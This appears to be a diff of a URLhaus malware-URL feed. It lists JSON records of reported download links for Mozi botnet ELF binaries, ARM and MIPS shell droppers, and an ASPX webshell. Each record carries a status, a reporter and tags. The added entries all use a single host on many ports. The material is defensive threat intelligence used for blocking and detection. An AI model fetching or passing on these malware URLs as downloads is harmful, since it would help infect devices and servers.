+{"id":"961038","urlhaus_reference":"https://urlhaus.abuse.ch/url/961038/","url":"http://89.160.20.156:35585/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961035","urlhaus_reference":"https://urlhaus.abuse.ch/url/961035/","url":"http://89.160.20.156:38398/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961036","urlhaus_reference":"https://urlhaus.abuse.ch/url/961036/","url":"http://89.160.20.156:59880/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961037","urlhaus_reference":"https://urlhaus.abuse.ch/url/961037/","url":"http://89.160.20.156:39138/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961033","urlhaus_reference":"https://urlhaus.abuse.ch/url/961033/","url":"http://89.160.20.156:51095/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
+{"id":"961034","urlhaus_reference":"https://urlhaus.abuse.ch/url/961034/","url":"http://89.160.20.156:45117/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]}
+{"id":"961032","urlhaus_reference":"https://urlhaus.abuse.ch/url/961032/","url":"http://89.160.20.156:50204/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:37:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961029","urlhaus_reference":"https://urlhaus.abuse.ch/url/961029/","url":"http://89.160.20.156:45079/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961030","urlhaus_reference":"https://urlhaus.abuse.ch/url/961030/","url":"http://89.160.20.156:52238/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961031","urlhaus_reference":"https://urlhaus.abuse.ch/url/961031/","url":"http://89.160.20.156:40312/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961026","urlhaus_reference":"https://urlhaus.abuse.ch/url/961026/","url":"http://89.160.20.156:39002/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961027","urlhaus_reference":"https://urlhaus.abuse.ch/url/961027/","url":"http://89.160.20.156:50773/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961028","urlhaus_reference":"https://urlhaus.abuse.ch/url/961028/","url":"http://89.160.20.156:50050/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961024","urlhaus_reference":"https://urlhaus.abuse.ch/url/961024/","url":"http://89.160.20.156:60081/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961025","urlhaus_reference":"https://urlhaus.abuse.ch/url/961025/","url":"http://89.160.20.156:58177/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961023","urlhaus_reference":"https://urlhaus.abuse.ch/url/961023/","url":"http://89.160.20.156:38589/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961022","urlhaus_reference":"https://urlhaus.abuse.ch/url/961022/","url":"http://89.160.20.156:39229/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:35:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961021","urlhaus_reference":"https://urlhaus.abuse.ch/url/961021/","url":"http://89.160.20.156:53595/Mozi.a","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961018","urlhaus_reference":"https://urlhaus.abuse.ch/url/961018/","url":"http://89.160.20.156:57279/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961019","urlhaus_reference":"https://urlhaus.abuse.ch/url/961019/","url":"http://89.160.20.156:49019/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961020","urlhaus_reference":"https://urlhaus.abuse.ch/url/961020/","url":"http://89.160.20.156:48558/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961017","urlhaus_reference":"https://urlhaus.abuse.ch/url/961017/","url":"http://89.160.20.156:58913/Mozi.a","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:34:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961016","urlhaus_reference":"https://urlhaus.abuse.ch/url/961016/","url":"http://89.160.20.156:49608/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:34:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961013","urlhaus_reference":"https://urlhaus.abuse.ch/url/961013/","url":"http://89.160.20.156:41143/bin.sh","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]}
+{"id":"961014","urlhaus_reference":"https://urlhaus.abuse.ch/url/961014/","url":"http://89.160.20.156:42129/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961015","urlhaus_reference":"https://urlhaus.abuse.ch/url/961015/","url":"http://89.160.20.156:47403/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:34:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961011","urlhaus_reference":"https://urlhaus.abuse.ch/url/961011/","url":"http://89.160.20.156:60187/Mozi.m","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961012","urlhaus_reference":"https://urlhaus.abuse.ch/url/961012/","url":"http://89.160.20.156:46097/Mozi.m","url_status":"offline","host":"89.160.20.156","date_added":"2021-01-14 16:34:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
+{"id":"961010","urlhaus_reference":"https://urlhaus.abuse.ch/url/961010/","url":"http://89.160.20.156:50771/i","url_status":"online","host":"89.160.20.156","date_added":"2021-01-14 16:31:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]}
 {"id":"961009","urlhaus_reference":"https://urlhaus.abuse.ch/url/961009/","url":"https://pastebin.com/raw/00aUJCLx","url_status":"offline","host":"pastebin.com","date_added":"2021-01-14 16:29:03 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"pmelson","larted":"false","tags":["ASPXShell","webshell"]}
-{"id":"961008","urlhaus_reference":"https://urlhaus.abuse.ch/url/961008/","url":"http://115.56.31.76:45117/bin.sh","url_status":"online","host":"115.56.31.76","date_added":"2021-01-14 16:25:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]}
-{"id":"961007","urlhaus_reference":"https://urlhaus.abuse.ch/url/961007/","url":"http://49.68.80.149:41485/Mozi.a","url_status":"online","host":"49.68.80.149","date_added":"2021-01-14 16:22:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961006","urlhaus_reference":"https://urlhaus.abuse.ch/url/961006/","url":"http://61.52.164.52:43851/Mozi.m","url_status":"online","host":"61.52.164.52","date_added":"2021-01-14 16:22:15 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961005","urlhaus_reference":"https://urlhaus.abuse.ch/url/961005/","url":"http://59.95.174.179:37095/Mozi.m","url_status":"offline","host":"59.95.174.179","date_added":"2021-01-14 16:22:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961004","urlhaus_reference":"https://urlhaus.abuse.ch/url/961004/","url":"http://58.249.18.32:59275/Mozi.m","url_status":"online","host":"58.249.18.32","date_added":"2021-01-14 16:22:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961002","urlhaus_reference":"https://urlhaus.abuse.ch/url/961002/","url":"http://83.224.148.209:46131/Mozi.m","url_status":"offline","host":"83.224.148.209","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961003","urlhaus_reference":"https://urlhaus.abuse.ch/url/961003/","url":"http://59.99.93.203:40129/Mozi.m","url_status":"offline","host":"59.99.93.203","date_added":"2021-01-14 16:22:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961000","urlhaus_reference":"https://urlhaus.abuse.ch/url/961000/","url":"http://27.204.253.74:43924/Mozi.m","url_status":"online","host":"27.204.253.74","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"961001","urlhaus_reference":"https://urlhaus.abuse.ch/url/961001/","url":"http://117.247.202.55:38851/i","url_status":"offline","host":"117.247.202.55","date_added":"2021-01-14 16:21:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
-{"id":"960996","urlhaus_reference":"https://urlhaus.abuse.ch/url/960996/","url":"http://125.44.13.139:33008/Mozi.m","url_status":"offline","host":"125.44.13.139","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960997","urlhaus_reference":"https://urlhaus.abuse.ch/url/960997/","url":"http://125.46.165.217:60201/Mozi.m","url_status":"online","host":"125.46.165.217","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960998","urlhaus_reference":"https://urlhaus.abuse.ch/url/960998/","url":"http://182.119.116.38:41479/Mozi.m","url_status":"online","host":"182.119.116.38","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960999","urlhaus_reference":"https://urlhaus.abuse.ch/url/960999/","url":"http://42.228.41.177:52003/Mozi.m","url_status":"online","host":"42.228.41.177","date_added":"2021-01-14 16:21:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960995","urlhaus_reference":"https://urlhaus.abuse.ch/url/960995/","url":"http://117.222.170.18:39500/Mozi.m","url_status":"offline","host":"117.222.170.18","date_added":"2021-01-14 16:20:16 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960994","urlhaus_reference":"https://urlhaus.abuse.ch/url/960994/","url":"http://115.58.165.141:36966/Mozi.m","url_status":"online","host":"115.58.165.141","date_added":"2021-01-14 16:20:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960991","urlhaus_reference":"https://urlhaus.abuse.ch/url/960991/","url":"http://117.247.206.204:59875/Mozi.m","url_status":"offline","host":"117.247.206.204","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960992","urlhaus_reference":"https://urlhaus.abuse.ch/url/960992/","url":"http://117.222.171.220:44123/Mozi.m","url_status":"offline","host":"117.222.171.220","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960993","urlhaus_reference":"https://urlhaus.abuse.ch/url/960993/","url":"http://117.194.163.151:45224/Mozi.a","url_status":"offline","host":"117.194.163.151","date_added":"2021-01-14 16:20:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960990","urlhaus_reference":"https://urlhaus.abuse.ch/url/960990/","url":"http://115.63.143.46:43105/Mozi.m","url_status":"online","host":"115.63.143.46","date_added":"2021-01-14 16:20:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960984","urlhaus_reference":"https://urlhaus.abuse.ch/url/960984/","url":"http://120.85.208.36:46011/Mozi.m","url_status":"online","host":"120.85.208.36","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960985","urlhaus_reference":"https://urlhaus.abuse.ch/url/960985/","url":"http://115.58.48.66:51170/Mozi.m","url_status":"online","host":"115.58.48.66","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960986","urlhaus_reference":"https://urlhaus.abuse.ch/url/960986/","url":"http://115.50.229.51:38025/Mozi.a","url_status":"online","host":"115.50.229.51","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960987","urlhaus_reference":"https://urlhaus.abuse.ch/url/960987/","url":"http://115.55.213.63:54132/Mozi.m","url_status":"online","host":"115.55.213.63","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960988","urlhaus_reference":"https://urlhaus.abuse.ch/url/960988/","url":"http://125.43.210.102:57705/Mozi.m","url_status":"online","host":"125.43.210.102","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960989","urlhaus_reference":"https://urlhaus.abuse.ch/url/960989/","url":"http://123.14.38.9:32983/Mozi.m","url_status":"online","host":"123.14.38.9","date_added":"2021-01-14 16:20:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960983","urlhaus_reference":"https://urlhaus.abuse.ch/url/960983/","url":"http://113.254.197.92:47908/Mozi.m","url_status":"offline","host":"113.254.197.92","date_added":"2021-01-14 16:19:13 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960982","urlhaus_reference":"https://urlhaus.abuse.ch/url/960982/","url":"http://113.89.245.89:35116/Mozi.m","url_status":"offline","host":"113.89.245.89","date_added":"2021-01-14 16:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960978","urlhaus_reference":"https://urlhaus.abuse.ch/url/960978/","url":"http://115.50.159.25:38070/Mozi.m","url_status":"online","host":"115.50.159.25","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960979","urlhaus_reference":"https://urlhaus.abuse.ch/url/960979/","url":"http://112.252.130.226:53399/Mozi.m","url_status":"online","host":"112.252.130.226","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960980","urlhaus_reference":"https://urlhaus.abuse.ch/url/960980/","url":"http://112.30.4.60:39529/Mozi.m","url_status":"online","host":"112.30.4.60","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960981","urlhaus_reference":"https://urlhaus.abuse.ch/url/960981/","url":"http://112.234.156.209:33465/Mozi.m","url_status":"offline","host":"112.234.156.209","date_added":"2021-01-14 16:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960977","urlhaus_reference":"https://urlhaus.abuse.ch/url/960977/","url":"http://59.99.44.18:59085/Mozi.m","url_status":"offline","host":"59.99.44.18","date_added":"2021-01-14 16:16:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"07ac0n","larted":"true","tags":["elf","Mozi"]}
-{"id":"960976","urlhaus_reference":"https://urlhaus.abuse.ch/url/960976/","url":"http://59.58.148.90:33799/i","url_status":"online","host":"59.58.148.90","date_added":"2021-01-14 16:09:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]}
-{"id":"960972","urlhaus_reference":"https://urlhaus.abuse.ch/url/960972/","url":"http://59.99.142.249:40430/Mozi.m","url_status":"offline","host":"59.99.142.249","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960973","urlhaus_reference":"https://urlhaus.abuse.ch/url/960973/","url":"http://59.99.47.139:43006/Mozi.m","url_status":"offline","host":"59.99.47.139","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960974","urlhaus_reference":"https://urlhaus.abuse.ch/url/960974/","url":"http://61.157.50.58:33385/Mozi.m","url_status":"online","host":"61.157.50.58","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960975","urlhaus_reference":"https://urlhaus.abuse.ch/url/960975/","url":"http://59.99.137.157:56649/Mozi.m","url_status":"offline","host":"59.99.137.157","date_added":"2021-01-14 16:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960971","urlhaus_reference":"https://urlhaus.abuse.ch/url/960971/","url":"http://59.99.137.202:55457/Mozi.m","url_status":"offline","host":"59.99.137.202","date_added":"2021-01-14 16:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960968","urlhaus_reference":"https://urlhaus.abuse.ch/url/960968/","url":"http://59.93.16.213:52314/Mozi.m","url_status":"offline","host":"59.93.16.213","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960969","urlhaus_reference":"https://urlhaus.abuse.ch/url/960969/","url":"http://42.230.56.231:41985/Mozi.m","url_status":"online","host":"42.230.56.231","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960970","urlhaus_reference":"https://urlhaus.abuse.ch/url/960970/","url":"http://125.41.97.157:53197/i","url_status":"online","host":"125.41.97.157","date_added":"2021-01-14 16:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]}
-{"id":"960967","urlhaus_reference":"https://urlhaus.abuse.ch/url/960967/","url":"http://125.43.61.168:54472/Mozi.m","url_status":"online","host":"125.43.61.168","date_added":"2021-01-14 16:06:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960966","urlhaus_reference":"https://urlhaus.abuse.ch/url/960966/","url":"http://219.154.101.44:38100/Mozi.m","url_status":"offline","host":"219.154.101.44","date_added":"2021-01-14 16:06:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960964","urlhaus_reference":"https://urlhaus.abuse.ch/url/960964/","url":"http://189.51.126.160:33121/Mozi.m","url_status":"offline","host":"189.51.126.160","date_added":"2021-01-14 16:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960965","urlhaus_reference":"https://urlhaus.abuse.ch/url/960965/","url":"http://14.154.28.65:39363/Mozi.m","url_status":"online","host":"14.154.28.65","date_added":"2021-01-14 16:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960961","urlhaus_reference":"https://urlhaus.abuse.ch/url/960961/","url":"http://182.119.18.6:42844/Mozi.m","url_status":"online","host":"182.119.18.6","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960962","urlhaus_reference":"https://urlhaus.abuse.ch/url/960962/","url":"http://219.156.209.2:45789/Mozi.a","url_status":"online","host":"219.156.209.2","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960963","urlhaus_reference":"https://urlhaus.abuse.ch/url/960963/","url":"http://221.15.193.168:34080/Mozi.m","url_status":"online","host":"221.15.193.168","date_added":"2021-01-14 16:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960960","urlhaus_reference":"https://urlhaus.abuse.ch/url/960960/","url":"http://117.194.161.162:56067/Mozi.m","url_status":"offline","host":"117.194.161.162","date_added":"2021-01-14 16:05:11 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960959","urlhaus_reference":"https://urlhaus.abuse.ch/url/960959/","url":"http://117.215.208.204:34205/Mozi.m","url_status":"offline","host":"117.215.208.204","date_added":"2021-01-14 16:05:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960957","urlhaus_reference":"https://urlhaus.abuse.ch/url/960957/","url":"http://117.222.162.116:53239/Mozi.m","url_status":"offline","host":"117.222.162.116","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
-{"id":"960958","urlhaus_reference":"https://urlhaus.abuse.ch/url/960958/","url":"http://117.215.209.95:53868/Mozi.m","url_status":"offline","host":"117.215.209.95","date_added":"2021-01-14 16:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]}
